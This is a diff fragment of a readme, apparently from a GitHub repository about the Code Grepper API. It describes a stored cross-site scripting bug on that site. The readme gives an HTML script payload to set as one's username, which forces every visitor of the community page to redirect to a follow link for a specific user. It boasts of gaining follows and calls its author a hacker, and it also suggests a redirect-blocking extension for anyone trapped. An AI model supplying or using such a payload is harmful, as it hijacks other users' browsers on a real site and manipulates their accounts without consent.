jub0t/CodeGrepperAPI/readme.md

     /api/follow.php?follow_user_id=98467&follow=1
 ```

 Get follows 100/hour Set your fun name to the code below.
 This bug will redirect **EVERYONE** visiting the community page to a follow link which will give you a follow(really dangerous).
 If you are now trapped in that loop just install the **[Redirect Blocker](https://chrome.google.com/webstore/detail/redirect-blocker/kjkidapfdhbcllgoaoobklapepffmcca/related?hl=en)** Extension and change your username.
-Thats why they call my hacker 😎😎.
+Thats why they call me hacker 😎😎.

 ```html
     <script>window.location.href = `/api/follow.php?follow_user_id=98467&follow=1`</script>